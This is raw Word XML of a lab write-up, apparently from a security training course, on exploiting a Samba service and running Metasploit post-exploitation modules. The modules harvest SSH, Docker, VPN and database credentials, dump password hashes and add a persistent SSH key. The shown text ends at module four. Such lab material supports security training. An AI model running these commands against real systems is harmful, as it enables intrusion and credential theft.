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AD9D" w14:textId="3134CE60" w:rsidR="00853ABF" w:rsidRPr="00184D59" w:rsidRDefault="00ED6B03">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Post Exploitation Lab II</w:t>
      </w:r>
      <w:r w:rsidRPr="00184D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C590C7E" w14:textId="77777777" w:rsidR="00ED6B03" w:rsidRDefault="00ED6B03"/>
    <w:p w14:paraId="0806A4C1" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EB35D7" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>In this lab, the target machine is running a vulnerable file-sharing service. Exploit it and run the following post modules on the target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216A7421" w14:textId="02992F8A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post/multi/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ssh_creds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> — grabs SSH keys and saved SSH logins so an attacker can connect later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF5CC2A" w14:textId="06085C46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post/multi/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>docker_creds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> — finds Docker login info and config so registries or containers can be abused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA6273E" w14:textId="18B9D39B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hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> — pulls user password hashes so they can be cracked offline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543C7A5F" w14:textId="24119B72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ecryptfs_creds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> — recovers keys for encrypted home folders so their files can be opened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2F6A4D" w14:textId="54DDDD51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enum_psk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> — searches for saved Wi-Fi/VPN pre-shared keys on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490DD301" w14:textId="13CEF410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enum_xchat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> — reads </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>XChat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>HexChat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> settings to steal stored IRC passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3264AEB2" w14:textId="1DCA326B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phpmyadmin_credsteal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> — finds phpMyAdmin config to steal database login details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8EBAA1" w14:textId="6DA7EED7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/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pptpd_chap_secrets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> — reads PPTP VPN secret file to get VPN usernames/passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9A95C6" w14:textId="6AFF42B2" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sshkey_persistence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> — adds an SSH key to a user so the attacker can come back anytime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE2487C" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0603BD7A" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC027B">
        <w:t> To exploit a vulnerable file-sharing service and utilize Metasploit post-exploitation modules to achieve system compromise, credential harvesting, and persistent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50338832" w14:textId="689B0C7E" w:rsidR="00ED6B03" w:rsidRDefault="00184D59">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEBDD48" w14:textId="77777777" w:rsidR="00184D59" w:rsidRDefault="00184D59">
      <w:r w:rsidRPr="00184D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PPTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00184D59">
        <w:t xml:space="preserve"> = the method used to make that tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089955BC" w14:textId="4FC47C92" w:rsidR="00184D59" w:rsidRPr="00184D59" w:rsidRDefault="00184D59">
      <w:r w:rsidRPr="00184D59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00184D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00184D59">
        <w:t xml:space="preserve"> = the service that uses it to protect your connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE47DD8" w14:textId="7DB0ACE6" w:rsidR="00184D59" w:rsidRPr="00184D59" w:rsidRDefault="00184D59">
      <w:r w:rsidRPr="00184D59">
        <w:t xml:space="preserve">PPTP is considered </w:t>
      </w:r>
      <w:r w:rsidRPr="00184D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>weak and outdated</w:t>
      </w:r>
      <w:r w:rsidRPr="00184D59">
        <w:t xml:space="preserve"> today</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39928D5F" w14:textId="5694F0BE" w:rsidR="00184D59" w:rsidRDefault="00184D59">
      <w:r w:rsidRPr="00184D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phpMyAdmin config</w:t>
      </w:r>
      <w:r w:rsidRPr="00184D59">
        <w:t xml:space="preserve"> means the </w:t>
      </w:r>
      <w:r w:rsidRPr="00184D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>configuration file</w:t>
      </w:r>
      <w:r w:rsidRPr="00184D59">
        <w:t xml:space="preserve"> used by </w:t>
      </w:r>
      <w:r w:rsidRPr="00184D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>phpMyAdmin</w:t>
      </w:r>
      <w:r w:rsidRPr="00184D59">
        <w:t>, a web tool that lets you manage MySQL or MariaDB databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1E9BCB" w14:textId="0B3BCC71" w:rsidR="00184D59" w:rsidRDefault="00184D59">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00184D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>XChat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00184D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00184D59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HexChat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00184D59">
        <w:t xml:space="preserve"> — simple IRC (Internet Relay Chat) client programs used to join chat rooms and talk in real time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC340C3" w14:textId="4C9418C9" w:rsidR="00184D59" w:rsidRDefault="00184D59">
      <w:r w:rsidRPr="00184D59">
        <w:t xml:space="preserve">They save settings (server list, nick, channels) and sometimes </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00184D59">
        <w:t>stored</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00184D59">
        <w:t xml:space="preserve"> passwords in config files, which a post-exploit module can read to steal login info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C80F12" w14:textId="562F82E1" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FA5D04" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRDefault="00DC027B"/>
    <w:p w14:paraId="39E39821" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC027B">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4FED59" w14:textId="00DAEEF8" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A056411" wp14:editId="7FFDBAF4">
            <wp:extent cx="5943600" cy="3343910"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1534219761" name="Picture 2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547B" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC027B">
        <w:t> Check if the target machine is reachable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F22FB46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4AC50BCE" w14:textId="77EEB47E" w:rsidR="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve">ping -c 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F23C01B" w14:textId="7EC512D9" w:rsidR="0056524F" w:rsidRPr="00DC027B" w:rsidRDefault="0056524F" w:rsidP="00DC027B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69711D0B" wp14:editId="55F6C6DD">
            <wp:extent cx="5772447" cy="2832246"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="213030224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0224" name="Picture 29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B282" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>The target is reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5966E271" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC027B">
        <w:t> Port scanning with Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B09F240" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve">We can now perform a default Nmap port scan on the target to identify the open ports on the target </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>system,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> this can be done by running the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279F5BFD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2798D17A" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> -p- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2CA9039F" w14:textId="4BC2A1BB" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="0056524F" w:rsidP="00DC027B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04C36133" wp14:editId="1041376F">
            <wp:extent cx="5855001" cy="2559182"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1089313370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3370" name="Picture 30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BD7B" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC027B">
        <w:t> The target machine can be exploited by using exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>is_known_pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve"> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFE05E6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38355040" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:lastRenderedPageBreak/>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="70547F4A" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>is_known_pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74A42421" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t xml:space="preserve">set RHOST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="580AF5B5" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3780F400" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>exploit -z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D7645" w14:textId="6D34BE1C" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B"/>
    <w:p w14:paraId="2A4F1FD7" w14:textId="6A3F8D26" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="0056524F" w:rsidP="00DC027B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2316DF9F" wp14:editId="0F086656">
            <wp:extent cx="5810549" cy="4534133"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="942313619" name="Picture 3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13619" name="Picture 3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4EBA" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC027B">
        <w:t> post/multi/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>ssh_creds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6D2A0451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https://www.rapid7.com/db/modules/post/multi/gather/ssh_creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF493F4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64DCF3A5" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>use post/multi/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>ssh_creds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B7BF276" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D115376" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:lastRenderedPageBreak/>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBBB15C" w14:textId="0F216FF3" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="0056524F" w:rsidP="00DC027B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10D06D29" wp14:editId="44648FEE">
            <wp:extent cx="5810549" cy="3245017"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1858655566" name="Picture 3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5566" name="Picture 32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C195" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC027B">
        <w:t> post/multi/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>docker_creds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01023C96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https://www.rapid7.com/db/modules/post/multi/gather/docker_creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDAF698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64331696" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>use post/multi/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC027B">
        <w:t>docker_creds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16F656FB" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03739089" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037C97D6" w14:textId="6B10312F" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="0056524F" w:rsidP="00DC027B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="673BC505" wp14:editId="5481DEB1">
            <wp:extent cx="5531134" cy="1955901"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="173399487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9487" name="Picture 33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ABD5" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 3: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hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02A1E1F9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https://www.rapid7.com/db/modules/post/linux/gather/hashdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1766CDE6" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF5AC20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hashdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="34D9219D" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EB63A6" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>set VERBOSE true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495A8217" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303D7B55" w14:textId="6E9E05E0" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="0004724B" w:rsidP="00DC027B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F544A4D" wp14:editId="1C4039AC">
            <wp:extent cx="5886753" cy="2991004"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1110955721" name="Picture 3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5721" name="Picture 34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3097" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
      <w:r w:rsidRPr="00DC027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 4: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ecryptfs_creds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45A1D9FC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https://www.rapid7.com/db/modules/post/linux/gather/ecryptfs_creds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D347D2C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11B2FF04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ecryptfs_creds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1AEE0403" w14:textId="77777777" w:rsidR="00DC027B" w:rsidRPr="00DC027B" w:rsidRDefault="00DC027B" w:rsidP="00DC027B">
